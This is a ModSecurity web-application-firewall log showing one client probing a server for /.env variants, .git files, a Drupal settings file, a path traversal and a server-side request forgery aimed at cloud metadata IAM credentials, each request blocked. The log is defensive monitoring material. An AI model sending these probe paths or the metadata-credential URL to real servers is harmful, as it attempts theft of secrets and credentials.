[Mon May 11 15:23:06.833659 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:45934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqy-5-wpj6Sx56aYhQAAABE"]
[Mon May 11 15:23:06.834271 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:45934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqy-5-wpj6Sx56aYhQAAABE"]
[Mon May 11 15:23:06.834293 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:45850] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYOuSQ-m-m0ukSShuBoQAAAVg"]
[Mon May 11 15:23:06.834762 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:45934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqy-5-wpj6Sx56aYhQAAABE"]
[Mon May 11 15:23:06.835143 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:45850] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYOuSQ-m-m0ukSShuBoQAAAVg"]
[Mon May 11 15:23:06.836431 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:45850] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYOuSQ-m-m0ukSShuBoQAAAVg"]
[Mon May 11 15:23:06.848123 2026] [core:error] [pid 1319885:tid 1319891] [client 195.178.110.133:45788] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:06.848402 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYOlchVQ3tCn0m9OpY6AAAAQU"]
[Mon May 11 15:23:06.848521 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYOlchVQ3tCn0m9OpY6AAAAQU"]
[Mon May 11 15:23:06.848696 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYOlchVQ3tCn0m9OpY6AAAAQU"]
[Mon May 11 15:23:06.849109 2026] [security2:error] [pid 1320398:tid 1320422] [client 195.178.110.133:45896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYOuJEyNRN152ArOSMkAAAAFY"]
[Mon May 11 15:23:06.849241 2026] [security2:error] [pid 1320398:tid 1320422] [client 195.178.110.133:45896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYOuJEyNRN152ArOSMkAAAAFY"]
[Mon May 11 15:23:06.849433 2026] [security2:error] [pid 1320398:tid 1320422] [client 195.178.110.133:45896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYOuJEyNRN152ArOSMkAAAAFY"]
[Mon May 11 15:23:06.849462 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:45818] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SiQAAANU"]
[Mon May 11 15:23:06.849647 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:45818] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SiQAAANU"]
[Mon May 11 15:23:06.849758 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:45818] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SiQAAANU"]
[Mon May 11 15:23:06.849941 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:45818] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqO9RdIr1DwxYR2SiQAAANU"]
[Mon May 11 15:23:06.849561 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYOuJEyNRN152ArOSMkQAAAEA"]
[Mon May 11 15:23:06.850274 2026] [security2:error] [pid 1320674:tid 1320693] [client 195.178.110.133:45838] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYOqO9RdIr1DwxYR2SiwAAAMM"]
[Mon May 11 15:23:06.850615 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYOuJEyNRN152ArOSMkQAAAEA"]
[Mon May 11 15:23:06.850693 2026] [security2:error] [pid 1319885:tid 1319888] [client 195.178.110.133:45928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYOlchVQ3tCn0m9OpY6gAAAQA"]
[Mon May 11 15:23:06.850725 2026] [security2:error] [pid 1320674:tid 1320693] [client 195.178.110.133:45838] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYOqO9RdIr1DwxYR2SiwAAAMM"]
[Mon May 11 15:23:06.850813 2026] [security2:error] [pid 1319885:tid 1319888] [client 195.178.110.133:45928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYOlchVQ3tCn0m9OpY6gAAAQA"]
[Mon May 11 15:23:06.850900 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYOuJEyNRN152ArOSMkQAAAEA"]
[Mon May 11 15:23:06.850909 2026] [security2:error] [pid 1320674:tid 1320693] [client 195.178.110.133:45838] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYOqO9RdIr1DwxYR2SiwAAAMM"]
[Mon May 11 15:23:06.851113 2026] [security2:error] [pid 1319885:tid 1319888] [client 195.178.110.133:45928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYOlchVQ3tCn0m9OpY6gAAAQA"]
[Mon May 11 15:23:06.851265 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:45934] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYOqy-5-wpj6Sx56aYiQAAABE"]
[Mon May 11 15:23:06.851404 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:45934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYOqy-5-wpj6Sx56aYiQAAABE"]
[Mon May 11 15:23:06.851492 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:45826] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYOqt2WtvoFr7xvGzUKAAAAIM"]
[Mon May 11 15:23:06.851608 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:45826] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYOqt2WtvoFr7xvGzUKAAAAIM"]
[Mon May 11 15:23:06.851610 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:45934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYOqy-5-wpj6Sx56aYiQAAABE"]
[Mon May 11 15:23:06.851892 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:45826] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYOqt2WtvoFr7xvGzUKAAAAIM"]
[Mon May 11 15:23:06.851886 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYOqt2WtvoFr7xvGzUKQAAAJQ"]
[Mon May 11 15:23:06.852007 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYOqt2WtvoFr7xvGzUKQAAAJQ"]
[Mon May 11 15:23:06.852205 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYOqt2WtvoFr7xvGzUKQAAAJQ"]
[Mon May 11 15:23:06.852385 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:45886] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYOuJEyNRN152ArOSMkgAAAEc"]
[Mon May 11 15:23:06.852500 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:45886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYOuJEyNRN152ArOSMkgAAAEc"]
[Mon May 11 15:23:06.852681 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:45886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYOuJEyNRN152ArOSMkgAAAEc"]
[Mon May 11 15:23:06.853965 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:45954] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYOqy-5-wpj6Sx56aYigAAAAE"]
